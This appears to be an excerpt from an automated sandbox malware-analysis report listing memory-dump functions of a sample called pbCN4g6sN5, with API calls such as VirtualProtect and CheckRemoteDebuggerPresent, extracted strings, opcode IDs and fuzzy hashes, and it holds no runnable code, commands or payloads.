                                                                                                                                                                Function 077FCF01 Relevance: 1.6, APIs: 1, Instructions: 110memoryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 077FCEBB
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387368395.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_77f0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                • Opcode ID: 8c38c396002546cb0443f73fac501682c4e3a6765e7ad42145293c8e7aca77b6
                                                                                                                                                                • Instruction ID: 3117bfa0c25229cec19817854e4a6c0b69887ed8091c6a2a9c56825f311d6c95
                                                                                                                                                                • Opcode Fuzzy Hash: 8c38c396002546cb0443f73fac501682c4e3a6765e7ad42145293c8e7aca77b6
                                                                                                                                                                • Instruction Fuzzy Hash: 2841FBB1E006198FDB18DFAAD94479EFBF2AFC8310F14C0AAD508A7264DB345A45CF21
                                                                                                                                                                Function 06D0D45B Relevance: 1.6, Strings: 1, Instructions: 328COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2385866228.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_6d00000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: Xmq
                                                                                                                                                                • API String ID: 0-2220694776
                                                                                                                                                                • Opcode ID: c5f44ac1cd89c9f0f06c304b073848e0e354e5dd999040a8134735a36bf786bf
                                                                                                                                                                • Instruction ID: b485c1ba40aa92cbbca8291aa8dd796f409232588b033549d1e5f3d2b52e8eb4
                                                                                                                                                                • Opcode Fuzzy Hash: c5f44ac1cd89c9f0f06c304b073848e0e354e5dd999040a8134735a36bf786bf
                                                                                                                                                                • Instruction Fuzzy Hash: ECB19670F04215CFFBA41FAA894433A7AA7AFC0B11F68591FD8969B2D4CE34C841DB95
                                                                                                                                                                Function 00A1B51C Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CheckRemoteDebuggerPresent.KERNELBASE(00000000,?), ref: 00A1D92F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2376261436.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a10000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3662101638-0
                                                                                                                                                                • Opcode ID: 934a41a5bc86a8b78cf669b2e6737a766765d71c51976e30a9ec2dd54f7a1ba8
                                                                                                                                                                • Instruction ID: 38217bc749ff8814eeafd56f1335b398f38017e737b2b51fc5f6b670fc3a5ae5
                                                                                                                                                                • Opcode Fuzzy Hash: 934a41a5bc86a8b78cf669b2e6737a766765d71c51976e30a9ec2dd54f7a1ba8
                                                                                                                                                                • Instruction Fuzzy Hash: 3D2136B18002598FDB10CF9AC444BEEBBF4EF49320F14846AE855B7251D778A944CFA4
                                                                                                                                                                Function 0764F453 Relevance: 1.5, Strings: 1, Instructions: 270COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387274782.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_7640000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: kQD
                                                                                                                                                                • API String ID: 0-3066535408
                                                                                                                                                                • Opcode ID: 25ee5be8c389b999c54f7c0d0de422b48b719adcaaaae8c76779d28eaa446df6
                                                                                                                                                                • Instruction ID: 7b04183a14d92bc83618a53505475bbd63d691deafa42ad46f8f6dea0d6c115b
                                                                                                                                                                • Opcode Fuzzy Hash: 25ee5be8c389b999c54f7c0d0de422b48b719adcaaaae8c76779d28eaa446df6
                                                                                                                                                                • Instruction Fuzzy Hash: AAC129B4D1020ADFDB04CFA9D5818AEFBB2FF89310F199556E406A7215DB34AA47CF90
                                                                                                                                                                Function 0764F418 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387274782.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_7640000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: kQD
                                                                                                                                                                • API String ID: 0-3066535408
                                                                                                                                                                • Opcode ID: d0c48b4569b82e2bb5247c35ec61e18d2c5c709019638449292b1d3eeacaa431
                                                                                                                                                                • Instruction ID: 4e9dc467129f3e5c80cac0b8a47b91d1c820d8ed048df36015c700395532457d
                                                                                                                                                                • Opcode Fuzzy Hash: d0c48b4569b82e2bb5247c35ec61e18d2c5c709019638449292b1d3eeacaa431
                                                                                                                                                                • Instruction Fuzzy Hash: 03C127B4D14209DFCB04CF99D5808EEFBB2FF89310F19A556D406AB215DB34AA86CF94
                                                                                                                                                                Function 0764F43E Relevance: 1.5, Strings: 1, Instructions: 262COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387274782.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_7640000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: kQD
                                                                                                                                                                • API String ID: 0-3066535408
                                                                                                                                                                • Opcode ID: 2ea667f973e475032fe31624e3f7501445ed4c21e46b2f96c9b4e078ed089659
                                                                                                                                                                • Instruction ID: 526bdad6a74be0972e791207beb4b5c59247b82572f58fafc7d0fd460ff45253
                                                                                                                                                                • Opcode Fuzzy Hash: 2ea667f973e475032fe31624e3f7501445ed4c21e46b2f96c9b4e078ed089659
                                                                                                                                                                • Instruction Fuzzy Hash: 11B118B4D20209DFDB04CFA9D4818AEFBB2FF89310B19A556D416A7215DB34AA47CF90
                                                                                                                                                                Function 077FBE60 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387368395.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_77f0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: <
                                                                                                                                                                • API String ID: 0-4251816714
                                                                                                                                                                • Opcode ID: ccc5c4e0a28f1c34f7b7df87f69d65ae871c3447afa99774497339a70995bbb1
                                                                                                                                                                • Instruction ID: aec80fd0e859f87713e1de1a6ecdb862a30446c3c569381892bbf63e5c930da1
                                                                                                                                                                • Opcode Fuzzy Hash: ccc5c4e0a28f1c34f7b7df87f69d65ae871c3447afa99774497339a70995bbb1
                                                                                                                                                                • Instruction Fuzzy Hash: 805196B5E016588FDB58CFAAC9446DDBBF2AFC9301F14C0AAD509AB364DB345A85CF40
                                                                                                                                                                Function 05A12488 Relevance: .6, Instructions: 596COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2385320229.0000000005A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A10000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_5a10000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: f7cc40faade943d09b903e1477a5c4d5b40edf3bf2aa22adec4313a55da36e01
                                                                                                                                                                • Instruction ID: cee6b7e639013d1f33e1ebbf814b3e2ad673257c0a295a46d549cceeec4f581d
                                                                                                                                                                • Opcode Fuzzy Hash: f7cc40faade943d09b903e1477a5c4d5b40edf3bf2aa22adec4313a55da36e01
                                                                                                                                                                • Instruction Fuzzy Hash: 12525A34A003458FCB14DF68C944B99B7B2FF89314F2582A9D5586F3A2DB71AD86CF81
                                                                                                                                                                Function 05A12458 Relevance: .6, Instructions: 595COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2385320229.0000000005A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A10000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_5a10000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 3f08a1be0745c447e7d4bf0b5fd9f497b3b95ecc032462faaf61cf7adc918d95
                                                                                                                                                                • Instruction ID: 51d52f44c142a2bedff950a71101270a078b7b48e59880c0045615bfc684efcb
                                                                                                                                                                • Opcode Fuzzy Hash: 3f08a1be0745c447e7d4bf0b5fd9f497b3b95ecc032462faaf61cf7adc918d95
                                                                                                                                                                • Instruction Fuzzy Hash: 19527B34A007558FCB10DF68C944B99B7F2FF89314F2582A9D5586F3A2DB71A986CF80
                                                                                                                                                                Function 08EA6291 Relevance: .3, Instructions: 324COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387833181.0000000008EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EA0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ea0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 5995bbe4134cec057829287951491ae81aaa867b72a83b10c849a04caabf980d
                                                                                                                                                                • Instruction ID: 3f5852b6ebb768719f529be2b5a712836fb7e62ac98d3b09d066547c170d1c54
                                                                                                                                                                • Opcode Fuzzy Hash: 5995bbe4134cec057829287951491ae81aaa867b72a83b10c849a04caabf980d
                                                                                                                                                                • Instruction Fuzzy Hash: C8F13C74E116698FCB14CF25C954B9DFBB6BF89700F1495EAD40EAB264D730AA86CF00
                                                                                                                                                                Function 08EA5B40 Relevance: .2, Instructions: 159COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387833181.0000000008EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EA0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ea0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: f18cabf034071b46a297d7775823dd5180672acba8ec0d8bf9a468332649f4a4
                                                                                                                                                                • Instruction ID: cf19b8f3ecf11c75e13963b7e928efc1a29d87e2bc2bc2ffe30d3b164a679cfa
                                                                                                                                                                • Opcode Fuzzy Hash: f18cabf034071b46a297d7775823dd5180672acba8ec0d8bf9a468332649f4a4
                                                                                                                                                                • Instruction Fuzzy Hash: FF611675D10219DFCB44CFE5D9486EEBBB1FF88702F10A82AE412AB254DB746A42CF51
                                                                                                                                                                Function 08EA5B2F Relevance: .2, Instructions: 150COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387833181.0000000008EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EA0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ea0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: c3ad6694f7a182341601711b263bd53fda33486568ee281745ea74d83503d227
                                                                                                                                                                • Instruction ID: 70e560945208e86a48b6aaff360e39b25beaee9ec9a577893073b2ba3b8e524d
                                                                                                                                                                • Opcode Fuzzy Hash: c3ad6694f7a182341601711b263bd53fda33486568ee281745ea74d83503d227
                                                                                                                                                                • Instruction Fuzzy Hash: E4615B75D14219DFCB44CFE4D9486EEBBB1FF89302F14A82AD412AB254DB746A02CF50
                                                                                                                                                                Function 0764E5D0 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387274782.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_7640000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 7d0034de5d72e8391517d5a63464a223737f0b98357014eabede33bd528a2e29
                                                                                                                                                                • Instruction ID: db1493f7b3b974a6a36f081c4f22cfd3bb7db0cf03007083ac405cbeec68a372
                                                                                                                                                                • Opcode Fuzzy Hash: 7d0034de5d72e8391517d5a63464a223737f0b98357014eabede33bd528a2e29
                                                                                                                                                                • Instruction Fuzzy Hash: 1D510AB4D11218CFDB18CFA6D9846DEBBB2BF89310F1480A9D50A77354DB356A86CF50
                                                                                                                                                                Function 0764E5C0 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387274782.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_7640000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 0019dc535c9bc59a2fb50febf6e221a9a86b2fa76116067a78aa92dfc6314401
                                                                                                                                                                • Instruction ID: 99a6e5adf51834dda70070f869067c53aa54e0c241eb9289e1229ce6164febd5
                                                                                                                                                                • Opcode Fuzzy Hash: 0019dc535c9bc59a2fb50febf6e221a9a86b2fa76116067a78aa92dfc6314401
                                                                                                                                                                • Instruction Fuzzy Hash: 704169B4D112588FDB18CFA6C8846CEBBF2BF88300F14C4AAD40AB7254DB355A86CF50
                                                                                                                                                                Function 08EA0D40 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387833181.0000000008EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EA0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ea0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: a581bea6d14b1634dc5cea46a5a871c17eaf1310a84700b357a4be1b6d1c47e2
                                                                                                                                                                • Instruction ID: 66ff493db3563f91b1b4a4ad25524d5d23c832db6e71494429cc86ec472e1630
                                                                                                                                                                • Opcode Fuzzy Hash: a581bea6d14b1634dc5cea46a5a871c17eaf1310a84700b357a4be1b6d1c47e2
                                                                                                                                                                • Instruction Fuzzy Hash: 4521B971E016189BEB58CF6BD9406DEFBF7AFC8200F04D1BAD508A6264EB341A468F51
                                                                                                                                                                Function 0587AA0A Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1522 587aa0a-587aaa7 GetCurrentProcess 1527 587aab0-587aae4 GetCurrentThread 1522->1527 1528 587aaa9-587aaaf 1522->1528 1529 587aae6-587aaec 1527->1529 1530 587aaed-587ab21 GetCurrentProcess 1527->1530 1528->1527 1529->1530 1531 587ab23-587ab29 1530->1531 1532 587ab2a-587ab45 call 587abe8 1530->1532 1531->1532 1536 587ab4b-587ab7a GetCurrentThreadId 1532->1536 1537 587ab83-587abe5 1536->1537 1538 587ab7c-587ab82 1536->1538 1538->1537
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0587AA96
                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 0587AAD3
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0587AB10
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0587AB69
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2384785521.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_5870000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                                                • Opcode ID: f2c27cc964c296b41da1863111daf0250ec4892efa3802bda7478d6261ae2c73
                                                                                                                                                                • Instruction ID: 779c5f9272d26536f9d88f1bda81994baf5e7871c78df1f192fde923e0462c7a
                                                                                                                                                                • Opcode Fuzzy Hash: f2c27cc964c296b41da1863111daf0250ec4892efa3802bda7478d6261ae2c73
                                                                                                                                                                • Instruction Fuzzy Hash: 155167B09002498FDB44DFAAD548BDEBBF1EF88314F208059E449A72A0D735A984CF65
                                                                                                                                                                Function 0587AA18 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1545 587aa18-587aaa7 GetCurrentProcess 1549 587aab0-587aae4 GetCurrentThread 1545->1549 1550 587aaa9-587aaaf 1545->1550 1551 587aae6-587aaec 1549->1551 1552 587aaed-587ab21 GetCurrentProcess 1549->1552 1550->1549 1551->1552 1553 587ab23-587ab29 1552->1553 1554 587ab2a-587ab45 call 587abe8 1552->1554 1553->1554 1558 587ab4b-587ab7a GetCurrentThreadId 1554->1558 1559 587ab83-587abe5 1558->1559 1560 587ab7c-587ab82 1558->1560 1560->1559
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0587AA96
                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 0587AAD3
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0587AB10
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0587AB69
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2384785521.0000000005870000.00000040.00000800.00020000.00000000.sdmp, Offset: 05870000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_5870000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                                                • Opcode ID: 6d421e1359b23444a85e0f2cb416212ab149bcfdd62d27429e40270b49701836
                                                                                                                                                                • Instruction ID: d7f20460930c325fe7cc00847b13eebb7b3ef0a7cd4e7004a24313f21234c88c
                                                                                                                                                                • Opcode Fuzzy Hash: 6d421e1359b23444a85e0f2cb416212ab149bcfdd62d27429e40270b49701836
                                                                                                                                                                • Instruction Fuzzy Hash: 5C5146B09006098FEB54DFAAD548BDEBBF1EF88314F20C459E409A72A0D735A984CF65
                                                                                                                                                                Function 07640B70 Relevance: 4.0, Strings: 3, Instructions: 245COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387274782.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_7640000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: (mq$(mq$(mq
                                                                                                                                                                • API String ID: 0-2000372054
                                                                                                                                                                • Opcode ID: 305a3e3335e48b0d9e2ab296bacb2d946663f515b1ab135468b52fb861d0d98a
                                                                                                                                                                • Instruction ID: 3d2b1da82f961a45c24d74cc9dfa47b8086afba02804d758e79e7e11ca31a252
                                                                                                                                                                • Opcode Fuzzy Hash: 305a3e3335e48b0d9e2ab296bacb2d946663f515b1ab135468b52fb861d0d98a
                                                                                                                                                                • Instruction Fuzzy Hash: 72A1ACB0A00319DFDB14DFA9C44479DBBF1FF89310F2485AAE409AB391DB70A985CB91
                                                                                                                                                                Function 07641150 Relevance: 2.9, Strings: 2, Instructions: 401COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387274782.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_7640000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: Hmq$Hmq
                                                                                                                                                                • API String ID: 0-2783791011
                                                                                                                                                                • Opcode ID: 4c7c2190bdd5f6ba85745aaff28a5f4a4aa234727892c843dd35f0191035dabb
                                                                                                                                                                • Instruction ID: c7f3628c2ae6e53120ad1670b1427e9d5af713c623021b197d0d334a51db9664
                                                                                                                                                                • Opcode Fuzzy Hash: 4c7c2190bdd5f6ba85745aaff28a5f4a4aa234727892c843dd35f0191035dabb
                                                                                                                                                                • Instruction Fuzzy Hash: 44D10270B142189BCB09FBB8D95956E7BFAEFCA200F44496AD446E7398DF389C05C361
                                                                                                                                                                Function 07642283 Relevance: 2.6, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387274782.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_7640000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: TJnq$Teiq
                                                                                                                                                                • API String ID: 0-3339893395
                                                                                                                                                                • Opcode ID: e025e3c745bca69b83d8742ecb84c547ac8dc497ad736b118dfbc65fa73dd3fc
                                                                                                                                                                • Instruction ID: f24ebe23ad0885418cd052b53b53a976c5e78b5cbfc5fdd0b994b3a082384146
                                                                                                                                                                • Opcode Fuzzy Hash: e025e3c745bca69b83d8742ecb84c547ac8dc497ad736b118dfbc65fa73dd3fc
                                                                                                                                                                • Instruction Fuzzy Hash: 8E11C6713082514FC7066B38996496E3BE6AFC7210B1940DAE506CF3A7CE248C06C7A6
                                                                                                                                                                Function 076422B0 Relevance: 2.5, Strings: 2, Instructions: 43COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387274782.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_7640000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: TJnq$Teiq
                                                                                                                                                                • API String ID: 0-3339893395
                                                                                                                                                                • Opcode ID: 4c3550c0c99dde27c1b8821f4385bccbbcd0d0ceb7adff16f2dcaa5e7b85f6d6
                                                                                                                                                                • Instruction ID: 05e8767b725e3e38df7c1db6d6b8263b5f96b41545620414a81e0d002a82dc48
                                                                                                                                                                • Opcode Fuzzy Hash: 4c3550c0c99dde27c1b8821f4385bccbbcd0d0ceb7adff16f2dcaa5e7b85f6d6
                                                                                                                                                                • Instruction Fuzzy Hash: 23F062323000115FCA44A77DA55897E76EBAFC9620715405DF50ACB3A5CE65DC064795
                                                                                                                                                                Function 0764C245 Relevance: 1.9, Strings: 1, Instructions: 637COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387274782.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_7640000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: hq
                                                                                                                                                                • API String ID: 0-1847014553
                                                                                                                                                                • Opcode ID: c7950adc31ca87bdbaec8c8f2ae106175f338d7ca5f8b5cdb94c9c57fd061df9
                                                                                                                                                                • Instruction ID: 47527aba5c78a62b9e9706a97025f3ceafe284a2e902e92742345ce6560336a0
                                                                                                                                                                • Opcode Fuzzy Hash: c7950adc31ca87bdbaec8c8f2ae106175f338d7ca5f8b5cdb94c9c57fd061df9
                                                                                                                                                                • Instruction Fuzzy Hash: A3E1C170B152048FCB04FBB8D69966E7BF6EB89210F804579D446E73A8DF38AD05C761
                                                                                                                                                                Function 07641971 Relevance: 1.8, Strings: 1, Instructions: 534COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387274782.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_7640000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: Teiq
                                                                                                                                                                • API String ID: 0-3087720294
                                                                                                                                                                • Opcode ID: 755358af725a8ebdfd0de77bf3943fbc2f92d7d6a85896408c5954d4da1673c1
                                                                                                                                                                • Instruction ID: cfda98edee6475319a1c8bdd0b160ceebba6af5c787a95665f5eb558f4b541f7
                                                                                                                                                                • Opcode Fuzzy Hash: 755358af725a8ebdfd0de77bf3943fbc2f92d7d6a85896408c5954d4da1673c1
                                                                                                                                                                • Instruction Fuzzy Hash: 35124E74B242048FCB04FFB9D69966E7BB6FB88200FA0453DE445A7369DE38AD05CB51
                                                                                                                                                                Function 07641980 Relevance: 1.8, Strings: 1, Instructions: 527COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387274782.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_7640000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: Teiq
                                                                                                                                                                • API String ID: 0-3087720294
                                                                                                                                                                • Opcode ID: bfe86b84dfb4cb54b8d94f58397e804de08cc052d63ff7beb09be91978158053
                                                                                                                                                                • Instruction ID: ac2d741be1f59b82adb8b25a271b8bf2b65f41a38c3b430dedfe789875860ded
                                                                                                                                                                • Opcode Fuzzy Hash: bfe86b84dfb4cb54b8d94f58397e804de08cc052d63ff7beb09be91978158053
                                                                                                                                                                • Instruction Fuzzy Hash: 98024D74B242048FCB04FFB9D69966E7BB6FB88200FA04539E445A7369DE38AD05CB51
                                                                                                                                                                Function 05878388 Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                                                                                                                                                                Download Yara Rule
